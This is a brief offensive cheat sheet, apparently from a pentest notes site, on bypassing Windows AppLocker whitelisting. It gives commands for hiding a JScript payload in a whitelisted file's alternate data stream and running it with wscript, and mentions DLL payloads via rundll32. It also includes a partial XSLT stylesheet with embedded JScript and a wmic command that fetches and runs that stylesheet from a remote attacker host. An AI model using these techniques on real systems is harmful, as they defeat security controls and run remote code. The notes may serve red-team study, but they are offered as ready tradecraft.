Application Whitelisting

Bypass using DLLs

By default DLLs are not included in AppLocker Rules, so we might be able to execute a unmanaged DLL payload with rundll32.exe.

Bypass using ADS

We can write a JScript payload to a whitelisted files ADS and then execute it with WScript:

type payload.js > whitelisted.txt:payload.js
wscript whitelisted.txt:payload.js

Bypass using 3rd Party Scripting Engine

If Python or a similar interpreter is installed we can use that to bypass AppLocker.



JScript Execution using XSLT

<?xml version='1.0'?>
<stylesheet version="1.0" xmlns="" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="">
<output method="text"/>
    <ms:script implements-prefix="user" language="JScript">
            var r = new ActiveXObject("WScript.Shell");

Execute with:

wmic process get brief /format:"http://<ip>/payload.xsl"

Last updated